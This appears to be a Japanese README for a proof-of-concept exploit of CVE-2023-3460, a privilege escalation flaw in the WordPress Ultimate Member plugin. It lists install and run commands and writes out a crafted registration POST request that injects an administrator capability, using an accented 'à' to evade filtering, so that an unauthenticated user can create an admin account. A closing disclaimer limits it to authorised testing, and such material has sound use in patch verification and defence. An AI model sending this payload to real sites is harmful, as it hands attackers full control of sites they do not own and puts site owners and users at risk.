
CVE-2023-3460 の概念実証エクスプロイト、WordPress Ultimate Member の権限昇格の脆弱性。細工された登録リクエストを介して管理者アカウントを作成します。許可されたテストのみを対象としています。
これは、WordPressプラグインUltimate Memberの深刻な脆弱性であるCVE-2023-3460の概念実証(PoC)エクスプロイトです。これにより、認証されていないユーザーが悪意のある登録リクエストを作成して権限を管理者に昇格させることができます。
🔥 影響: 不正な管理者アカウントの作成によるサイト全体の侵害
requests ライブラリurllib3 ライブラリbeautifulsoup4 ライブラリ必要条件のインストール:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce)を取得wp_capabilitiesにadministratorロールを注入POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
このスクリプトは教育および許可されたテスト目的のみで提供されます。システムの不正な悪用は違法であり、非倫理的です。所有しているかテストする許可があるシステムでのみ使用してください。